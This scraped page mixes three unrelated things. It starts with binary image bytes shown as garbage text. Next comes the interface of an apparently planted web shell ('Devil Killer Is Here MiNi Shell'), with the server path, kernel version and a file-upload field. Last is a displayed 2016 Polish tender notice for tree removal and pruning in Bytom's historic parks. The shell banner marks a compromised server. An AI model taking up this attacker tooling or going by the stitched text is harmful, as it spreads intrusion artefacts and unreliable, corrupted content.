JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160205/12703-N-2016.html

<p class="kh_header"><b>Bytom: Rewaloryzacja zabytkowych parków w Bytomiu</b><br>
<b>Numer ogłoszenia: 12703 - 2016; data zamieszczenia: 05.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Zieleni i Gospodarki Komunalnej , ul. Smolenia 35, 41-902 Bytom, woj. śląskie, tel. 32 42 07 700, faks 32 42 07 701.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzzigk.bytom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewaloryzacja zabytkowych parków w Bytomiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszego zamówienia jest rewaloryzacja parków zabytkowych w Bytomiu w podziale na trzy zadania. Zakres prac obejmuje:
1/ ZADANIE nr 1
Prace w Parku Miejskim im. F. Kachla położonym przy ul. Wrocławskiej, Tarnogórskiej  i Olimpijskiej                     w Bytomiu:
	-  usuwanie drzew w ilości 100 szt.
	- prace pielęgnacyjne w koronach drzew  w ilości 450 szt.
2/ ZADANIE nr 2
Prace w  Parku Fazaniec położonym przy ul. Orzegowskiej:
	-  usuwanie drzew w ilości 630 szt.
	- prace pielęgnacyjne w koronach drzew w ilości 531 szt.
	- usuniecie krzewów w ilości 240 m2,
	- wykaszanie podrostu na powierzchni 4,0 ha.
3/ ZADANIE nr 3
Prace w Parku Ludowym położonym przy ul. Frenzla, Racjonalizatorów i Dzierżonia:
	-  usuwanie drzew w ilości 300 szt.
	- prace pielęgnacyjne w koronach drzew w ilości 150 szt.
2.	Szczegółowy opis prac i wymagań Zamawiającego oraz wykaz drzew został określony  w szczegółowym opisie przedmiotu zamówienia stanowiącym załącznik nr 8 do SIWZ.
3.	Podane w SIWZ i załącznikach ilości drzew są orientacyjne (szacunkowe) i mają służyć  do kalkulacji ceny ofertowej i dokonania wyboru najkorzystniejszej oferty.
4.	Wykonawca w ofercie winien określić liczbę dni na uprzątnięcie terenu po wycince drzewa. 
5.	Zamawiający zwraca uwagę, że w związku z wykonywaniem prac Wykonawca jest również zobowiązany do:
	- zabezpieczenia terenu przy wykonywaniu prac,
	- szczególnej ostrożności i dbałości o otoczenie prac  z uwagi na wykonywanie zamówienia na terenie parku zabytkowego, 
	- przywrócenia stanu poprzedniego w razie wyrządzenia szkód lub zniszczeń w otoczeniu prowadzonych prac (w szczególności dot. nawierzchni i obrzeży alejek, drzew, krzewów, trawników).
6.	Zamawiający dopuszcza możliwość składania ofert częściowych. 
Wykonawca przystępujący do niniejszego postępowania o udzielenie zamówienia może złożyć ofertę na jedno lub więcej zadań. 
 Wykonawca składający ofertę na więcej niż jedno zadanie może złożyć oświadczenia i dokumenty  
w jednym egzemplarzu i dołączyć do formularza ofertowego jednego z zadań.
Tak złożone oświadczenia i dokumenty będą traktowane jako odnoszące się do każdej części, na którą została złożona oferta..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających polegających na wykonaniu usług w zakresie objętym przedmiotem niniejszego zamówienia stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.15.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, że w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje usługi odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia tj. : 
wykonał i/lub wykonuje usługi polegające na usuwaniu drzew i wykonaniu cięć pielęgnacyjnych                          w koronach drzew zieleni zabytkowej lub wykonaniu cięć pielęgnacyjnych w koronach drzew zieleni zabytkowej na łączną wartość:
a ) w zakresie zadania nr 1  - co najmniej 100 000,00 zł brutto,
b ) w zakresie zadania nr 2  - co najmniej 250 000,00 zł brutto,
c) w zakresie zadania nr 3 - co najmniej 50 000,00 zł brutto.
UWAGA: w przypadku usług wykonywanych Zamawiający uzna spełnienie w/w warunku, jeżeli do upływu terminu wyznaczonego na składanie ofert nastąpiła realizacja usług co najmniej na kwotę wskazaną w postawionym warunku.

Wykonawca składając ofertę na więcej niż jedno zadanie może wykazać się odrębnym   doświadczeniem na każdym z zadań lub może wykazać się tym samym doświadczeniem niemniej jednak winno ono odpowiadać sumie kwot określonych dla zadań na które składa ofertę.
W przypadku, gdy wartość dotycząca ww. warunków wyrażona będzie w walucie innej niż PLN, wartość wykonanej/wykonywanej usługi należy przeliczyć wg średniego kursu NBP  obowiązującego w dniu zawarcia umowy. W przypadku braku średniego kursu NBP z dnia zawarcia umowy należy dokonać przeliczenia podanych kwot z waluty obcej na ich równowartość w PLN po średnim kursie NBP ostatnio obowiązującym przed dniem zawarcia umowy z podaniem daty kursu

Zamawiający oceni spełnianie w/w warunków udziału w postępowaniu na podstawie oświadczeń                                i dokumentów określonych w cz. V SIWZ, które weryfikowane będą wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w jego wykonywaniu, w szczególności odpowiedzialnych za świadczenie usług, tj. co najmniej:
a)	pilarzami drzew ozdobnych wykonującymi prace metodą alpinistyczną:
-  w zakresie zadania nr 1  - co najmniej trzema pilarzami drzew ozdobnych wykonującymi prace metodą alpinistyczną ,
- w zakresie zadania nr 2  - co najmniej sześcioma pilarzami drzew ozdobnych wykonującymi prace metodą alpinistyczną,
- w zakresie zadania nr 3 - co najmniej dwoma pilarzami drzew ozdobnych wykonującymi prace metodą alpinistyczną.
b) jedną osobą, która ukończyła studia drugiego stopnia lub jednolite studia magisterskie, których program obejmuje zajęcia lub grupy zajęć umożliwiające nabycie wiedzy i umiejętności w tym zakresie, oraz która po rozpoczęciu studiów drugiego stopnia lub po zaliczeniu szóstego semestru jednolitych studiów magisterskich, przez co najmniej 9 miesięcy brała udział w pracach konserwatorskich lub pracach restauratorskich prowadzonych przy tego rodzaju zabytkach wpisanych do rejestru, lub była zatrudniona przy tych pracach w muzeum będącym instytucją kultury zgodnie z art. 37 b ust. 1ustawy z dnia 23 lipca 2003 r. (j.t. Dz. U. z 2014, poz. 1446 z późn. zm.) o ochronie zabytków  i opiece nad zabytkami,
 c) jedną osobą posiadającą świadectwo ukończenia szkoły średniej zawodowej oraz tytuł zawodowy albo wykształcenie średnie i dyplom potwierdzający kwalifikacje zawodowe w zawodach związanych z pielęgnacją zieleni, albo przez co najmniej 9 miesięcy brała udział w tego rodzaju pracach prowadzonych przy zabytkach wpisanych do rejestru lub była zatrudniona przy tych pracach w muzeum będącym instytucją kultury zgodnie z art. 37 b ust. 3 ustawy z dnia 23 lipca 2003 r. (j.t. Dz. U. z 2014, poz. 1446 z późn. zm.) o ochronie zabytków  i opiece nad zabytkami.

Wykonawca składając ofertę na więcej niż jedno zadanie winien wykazać się osobami wymienionymi w lit. a i c w ilości stanowiącej  sumę osób przypadającej na zadanie, na które składa ofertę.

Zamawiający oceni spełnianie w/w warunków udziału w postępowaniu na podstawie oświadczeń                                i dokumentów określonych w cz. V SIWZ, które weryfikowane będą wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.formularz oferty, 
2. oświadczeń i dokumentów wskazanych w części V niniejszej specyfikacji
oraz - jeśli dotyczy:
3) pełnomocnictwa do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba upoważniona do reprezentowania Wykonawcy z mocy prawa - oryginał lub kopia poświadczona notarialnie za zgodność                  z oryginałem,
4) dokumentu potwierdzającego ustanowienie pełnomocnika (lidera konsorcjum) zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych, w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia - oryginał lub kopia poświadczona notarialnie za zgodność z oryginałem,
5) informacji, czy wybór oferty będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego, wskazując nazwę (rodzaj) towaru lub usługi, których dostawa lub świadczenie będzie prowadzić do jego powstania oraz wskazując ich wartość bez kwoty podatku, zgodnie z cz.XI pkt 6 SIWZ.
7. Jeżeli wykonawca będzie polegał na wiedzy i doświadczeniu oraz osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków wówczas zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.

	Zamawiający zwraca uwagę, że korzystając z zasobów podmiotu trzeciego w celu wykazania spełnienia warunków udziału w postępowaniu, wykonawca jest zobowiązany udowodnić zamawiającemu faktyczną możliwość dysponowania tymi zasobami, przedstawiając w tym celu wszelkie konieczne dokumenty.                           W szczególności  może to być zobowiązanie podmiotu trzeciego. 

Zobowiązane takie powinno szczegółowo określać: 
- podmiot trzeci udostępniający swoje zasoby,
- wykonawcę na rzecz którego udostępniane są zasoby,
- nazwę zamówienia dla realizacji którego udostępniane są zasoby, 
- zasoby, które podmiot trzeci udostępnia,
- czas na jaki zasoby te są udostępnione,
- formę w jakiej podmiot trzeci będzie uczestniczył w wykonywania zamówienia, jeżeli udostępnienie dotyczy zasobów wiedzy i doświadczenia.*

* Z uwagi iż  zasoby wiedzy i doświadczenia są nierozerwalnie związane z podmiotem je udostępniającym                            i  niemożliwe do samodzielnego obrotu,  zobowiązanie powinno wprost wskazywać na formę, w jakiej podmiot trzeci będzie uczestniczył w wykonywania zamówienia, np. podwykonawstwo, doradztwo, współpraca w określonym zakresie  itp.

Zobowiązanie podmiotu trzeciego powinno być podpisane przez osobę/osoby posiadające prawo reprezentowania podmiotu trzeciego zgodnie z zasadą reprezentacji  określoną we właściwym rejestrze lub innym dokumencie właściwym dla formy organizacyjnej tego podmiotu lub osobę/osoby posiadające prawo reprezentowania podmiotu trzeciego na podstawie odrębnego umocowania (pełnomocnictwa). Pełnomocnictwo to, w oryginale lub kopii notarialnie potwierdzonej za zgodność z oryginałem, musi zostać załączone do oferty.
Zobowiązanie podmiotów trzecich do udostępnienia zasobów winno zostać złożone w oryginale (można skorzystać z załącznika nr 8 do siwz).

Zamawiający zwraca uwagę, że zgodnie z art. 26 ust. 2e ustawy  podmiot, który zobowiązał się do udostępnienia swoich zasobów odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek  nieudostępnienia tych zasobów chyba, że za nieudostępnienie tych zasobów nie ponosi winy.
8.	Zgodnie z art. 23 w związku z art. 141 ustawy o udzielenie zamówienia ubiegać się mogą Wykonawcy działający wspólnie (konsorcja, spółki cywilne). W przypadku, gdy do przetargu przystępują Wykonawcy działający wspólnie, winni oni ustanowić pełnomocnika zgodnie z art. 23 ust. 2 ustawy. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem (liderem) konsorcjum.
	Zasady powyższe dotyczą również spółek cywilnych (wspólników spółki cywilnej).
9. Zgodnie z art. 8 ust. 3 ustawy Prawo zamówień publicznych, Wykonawca może zastrzec w ofercie tajność informacji w niej zawartych stanowiących tajemnicę przedsiębiorstwa. W takim przypadku winien wykazać, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa zgodnie z art. 11 ust. 4  w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji. W tym celu Wykonawca winien w szczególności:
1)	wskazać zastrzeżone dokumenty lub ich części,
2)	wyjaśnić podstawy wyłączenia jawności w stosunku do każdego z nich,
3)	wyjaśnić, czy informacje w nich zawarte nie były poznawalne dla osób trzecich,
4)	wskazać potrzeby uznania danego dokumentu lub jego części za tajemnicę  przedsiębiorstwa,
wykazać, że zastrzeżone informacje mają dla Wykonawcy znaczenie z uwagi na  mechanizmy konkurencji, a ich ujawnienie narażałoby interesy Wykonawcy na  szkodę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Oferowana liczba dni na uprzątnięcie terenu po wycince drzewa - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem niżej określonych możliwości i warunków dokonania takiej zmiany:
1) Zamawiający przewiduje możliwość zmiany strony umowy z przyczyn innych niż cesja, tj. następstwo prawne wynikające z odrębnych przepisów, 
2) Zamawiający przewiduje możliwość zmiany terminu wykonania zamówienia, jeżeli dochowanie terminu określonego w umowie jest niemożliwe z uwagi na:
a) warunki atmosferyczne uniemożliwiające realizację zamówienia
b) siłę wyższą lub inne okoliczności niezależne od Wykonawcy lub których Wykonawca przy zachowaniu należytej staranności nie  był w stanie uniknąć lub przewidzieć, 
c) wstrzymanie przez Zamawiającego realizacji prac objętych przedmiotem zamówienia w przypadkach koniecznych i uzasadnionych,
3) zmiany wynagrodzenia brutto w przypadku zmiany przepisów obowiązujących dot. podatku VAT,
4) zmiany bądź wprowadzenia innego zakresu podzlecanej usługi lub rezygnacji z podwykonawstwa, zgodnie z § 4 ust. 3 umowy. Dokumenty potwierdzające spełnienie warunków udziału w postępowaniu Wykonawca zobowiązany jest złożyć wraz z wnioskiem o którym mowa w ust. 2,
5) zmiany bądź rezygnacji z udziału podmiotów trzecich nie będących podwykonawcami zgodnie z § 4 ust. 5 umowy.  Dokumenty potwierdzające spełnienie warunków udziału w postępowaniu Wykonawca zobowiązany jest złożyć wraz z wnioskiem o którym mowa w ust. 2.
2. Dokonanie zmiany umowy w zakresie jw. wymaga uprzedniego złożenia na piśmie wniosku Wykonawcy wykazującego zasadność wprowadzenia zmian i zgody Zamawiającego na jej dokonanie lub przedłożenie propozycji zmiany przez Zamawiającego. 
3. Powyższe zmiany winny być dokonane w formie pisemnego aneksu pod rygorem nieważności.
4. Istotna zmiana umowy dokonana z naruszeniem ust. 1 jest nieważna.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzzigk.magistrat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Zieleni i Gospodarki Komunalnej
41-902 Bytom, ul. Smolenia 35.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2016 godzina 12:00, miejsce: Miejski Zarząd Zieleni i Gospodarki Komunalnej
41-902 Bytom, ul. Smolenia 35
(III piętro, sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Z postępowania wyklucza się Wykonawców w stosunku do których zachodzą przesłanki określone w art. 24 ust. 1 i 2 ustawy, a także Wykonawców, którzy w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszyli obowiązki zawodowe, w szczególności gdy w wyniku zamierzonego działania bądź rażącego niedbalstwa nie wykonali lub nienależycie wykonali zamówienie, chyba że Wykonawca udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiegać takiemu naruszeniu obowiązków w przyszłości oraz naprawił lub zobowiązał się do naprawienia szkód powstałych w wyniku  naruszenia obowiązków. 
2. W niniejszym postępowaniu Zamawiający nie wymaga wniesienia należytego wykonania umowy.
3. Zamówienie dofinansowane jest przez Wojewódzki Fundusz Ochrony Środowiska i Gospodarki Wodnej w Katowicach..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rewaloryzacja zabytkowych parków                       w Bytomiu - Park Miejski im. F. Kachla.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prace w Parku Miejskim im. F. Kachla położonym przy ul. Wrocławskiej, Tarnogórskiej  i Olimpijskiej                     w Bytomiu:
	-  usuwanie drzew w ilości 100 szt.
	- prace pielęgnacyjne w koronach drzew  w ilości 450 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.15.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
